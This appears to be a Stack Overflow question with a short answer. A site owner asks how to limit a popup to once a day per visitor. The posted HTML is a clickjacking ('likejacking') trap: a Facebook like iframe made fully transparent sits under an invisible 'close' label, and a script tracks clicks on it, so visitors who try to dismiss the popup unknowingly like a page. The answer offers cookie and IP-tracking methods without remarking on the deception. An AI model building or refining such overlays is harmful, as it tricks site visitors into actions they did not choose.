# How can I show popup once a day

Tags: facebook, popup

I have this code on `<head>`

```
<script src="http://jqueryjs.googlecode.com/files/jquery-1.2.6.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script src="http://icmovie.info/traker/jquery.iframetracker.js"></script>
<script>
jQuery(document).ready(function($){
$('.social_facebook iframe').iframeTracker({
blurCallback: function(){
}
});
});
</script>
```

And in the `<buddy>` i have this code :

```
<div id="popup_facebook" style="position:fixed; z-index:105;width:970px;height:850px;top:0px;padding-right:150px;padding-left:150px;background-image: url('http://www.mediuonline.info/images/overlay.png');">
<div style="position:absolute; display:inline;z-index:107;top:100px;"><a target="_new" href="http://bit.ly/MqmyHZ"><img src="http://www.mediuonline.info/images/icmovie-info.jpg" ></a></div>
<div style="position:absolute;display:inline;z-index:109; left:703px; top:108px; width:10px; height:10px;opacity:0;filter:alpha(opacity=0);">inchide</div>
<div class="social_facebook" id="iframefacebook_like" style="position:absolute;display:inline;z-index:108; left:713px; top:108px; width:10px; height:10px;">
<div style="position:absolute;overflow:hidden;width:60px;left:20px;opacity:0;filter:alpha(opacity=0);">
<iframe src="http://portalfun.ro/facebook.php" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:200px; height:21px;" allowTransparency="true"></iframe>
</div>
</div>
</div>
```

how can I do to show popup only once a day / ip or by visitor

Comment: `<body`, not `<buddy>`?

Answer (score 0):

Option 1:

Store lastPopUpShown in cookie and check it to see if it has been a day since the last shown

Option 2:

Store lastPopUpShown and IP as pair in server's Database. Check if it should be shown and add/remove corresponding javascript correspondingly